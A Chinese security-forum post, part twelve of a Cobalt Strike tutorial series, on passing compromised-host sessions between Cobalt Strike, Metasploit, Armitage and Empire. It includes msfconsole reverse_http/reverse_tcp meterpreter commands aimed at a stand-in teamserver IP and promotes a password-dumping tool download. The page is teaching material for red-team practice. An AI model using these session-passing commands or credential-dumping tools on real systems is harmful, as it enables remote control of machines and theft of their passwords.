用户
搜索
  • TA的每日心情
    郁闷
    2019-2-10 15:17
  • 签到天数: 40 天

    连续签到: 1 天

    [LV.5]常住居民I

    版主

    QQ547006660~欢迎交流

    Rank: 7Rank: 7Rank: 7

    41

    主题

    126

    帖子

    7223

    魔法币
    收听
    0
    粉丝
    33
    注册时间
    2017-1-18

    秦春秋文阁春秋游侠核心白帽i春秋签约作者幽默灌水王积极活跃奖

    J0o1ey 版主 QQ547006660~欢迎交流 秦 春秋文阁 春秋游侠 核心白帽 i春秋签约作者 幽默灌水王 积极活跃奖 楼主
    发表于 2019-7-29 20:30:29 312274

    0x000-前文

    Cobaltstrike系列教程(一)简介与安装
    https://bbs.ichunqiu.com/thread-52937-1-1.html
    Cobaltstrike系列教程(二)Listner与Payload生成
    https://bbs.ichunqiu.com/thread-52982-1-1.html
    Cobaltstrike系列教程(三)beacon详解
    https://bbs.ichunqiu.com/thread-52994-1-1.html
    Cobaltstrike系列教程(四)菜单栏与视图
    https://bbs.ichunqiu.com/thread-52997-1-1.html
    Cobaltstrike系列教程(五)凭据导出
    https://bbs.ichunqiu.com/thread-53001-1-1.html
    Cobaltstrike系列教程(六)文件/进程管理与键盘记录
    https://bbs.ichunqiu.com/thread-53003-1-1.html
    Cobaltstrike系列教程(七)端口扫描与Net View
    https://bbs.ichunqiu.com/thread-53012-1-1.html
    Cobaltstrike系列教程(八)截图与浏览器代理
    https://bbs.ichunqiu.com/thread-53013-1-1.html
    Cobaltstrike系列教程(九)内置Socks与神器EW
    https://bbs.ichunqiu.com/thread-53014-1-1.html
    Cobaltstrike系列教程(十)安装扩展
    https://bbs.ichunqiu.com/thread-53015-1-1.html
    Cobaltstrike系列教程(十一)提权与横向移动
    https://bbs.ichunqiu.com/thread-53043-1-1.html

    0x001-Cobaltstrike与MSF会话互转

    ①Metasploit派生shell给Cobaltstrike

    首先,你需要拿到一个metepreter会话,本例中session为1
    Cobaltstrike的teamserver的ip为8.8.8.8,http监听器端口为4555

    msf exploit(handler) >  use exploit/windows/local/payload_inject
    msf exploit(payload_inject) >  set PAYLOAD windows/meterpreter/reverse_http
    msf exploit(payload_inject) > set DisablePayloadHandler true
    msf exploit(payload_inject) > set LHOST 8.8.8.8.
    msf exploit(payload_inject) > set LPORT 4555
    msf exploit(payload_inject) > set SESSION 1
    msf exploit(payload_inject) > exploit

    如图Cobaltstrike成功上线
    e8Qn4H.png

    ②Cobalt strike 派生 shell 给 MSF(前提有个beacon shell)

    msf > use exploit/multi/handler 
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(handler) > set lhost 8.8.8.8
    lhost => 8.8.8.8
    msf exploit(handler) > set lport 5555
    lport => 5555
    msf exploit(handler) > exploit

    然后在cobaltstrike中创建一个windows/foreign/reverse_tcp Listener
    ,并根据metasploit监听配置cobaltstrike的listener
    e8QVHO.png

    选择要派生的beacon,右键-->增加会话,选择刚刚配置的foreign监听器
    e8QEDK.png

    MSF即可成功收到会话
    e8QAu6.png

    0x002-Cobaltstrike与Armitage会话互转

    ①Cobaltstrike派生shell给Armitage

    首先在armitage中配置一个handler,注意:payload要与cobaltstrike的foreign监听器的协议相同,不然收不到会话。
    e8Qlvt.png
    同样使用刚刚讲过的cobaltstrike派生会话功能,armitage即可收到shell
    e8Q3KP.png

    Armitage派生shell给cobaltstrike

    选择armitage中的会话,右键,Access-->Pss Session
    e8QeED.png
    随后配置相关信息为cobaltstrike http监听器的ip和端口
    e8QmUe.png
    Cobaltstrike即可收到会话

    0x003-Cobaltstrike与Empire会话互转

    首先如图,在empire中配置好相关的http协议监听器
    e8QKCd.png
    在cobaltstrike里面添加一个foreign监听器,协议为http
    e8QM8A.png
    随后使用cobaltstrike中讲过的“增加会话”功能,选择该http监听器,empire即可成功收到会话。

    0x004-小福利

    今天分享的是神器nirsoft半汉化版,该程序在以管理员的身份运行时,可以读取机器中各种各样的密码,无疑是后渗透的神器之一。
    回复下载

    e8QQgI.png


    游客,如果您要查看本帖隐藏内容请回复

    本帖被以下淘专辑推荐:

    有培训需求或是技术交流需求的朋友可以联系我~QQ547006660交流群820783253
    瞅瞅瞅瞅瞅瞅瞅瞅瞅瞅瞅瞅瞅瞅瞅瞅瞅瞅瞅瞅
    使用道具 举报 回复
    吱吱吱吱吱吱吱吱吱吱吱吱吱吱吱吱吱吱吱
    使用道具 举报 回复
    66666666666666666666666666666666666
    使用道具 举报 回复

    6666666666666666666666666666666666
    使用道具 举报 回复
    读取机器密码神器下载下载
    使用道具 举报 回复
    发表于 2019-8-11 11:40:22

    这个神器只有后渗透有点用
    使用道具 举报 回复
    这个神器只有后渗透有点用
    使用道具 举报 回复
    看福利  收工具
    使用道具 举报 回复
    嘻嘻嘻谢谢分享
    使用道具 举报 回复
    感谢分享
    使用道具 举报 回复
    66666666666666
    使用道具 举报 回复
    发表于 2019-7-30 17:50:35
    谢谢大佬
    使用道具 举报 回复
    发表于 2019-7-30 18:17:59
    6666666666666
    使用道具 举报 回复
    发表于 2019-7-30 21:22:46
    謝謝分享
    使用道具 举报 回复
    发表于 2019-7-31 03:54:36
    来了
    使用道具 举报 回复
    很好啊吓走了
    使用道具 举报 回复
    发表于 2019-7-31 16:31:09
    6666666666666666
    使用道具 举报 回复
    感谢分享
    使用道具 举报 回复
    nirsoft半汉化版
    使用道具 举报 回复
    发表于 2019-8-1 00:48:50

    66666666666666
    使用道具 举报 回复
    66666666666
    使用道具 举报 回复
    123下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册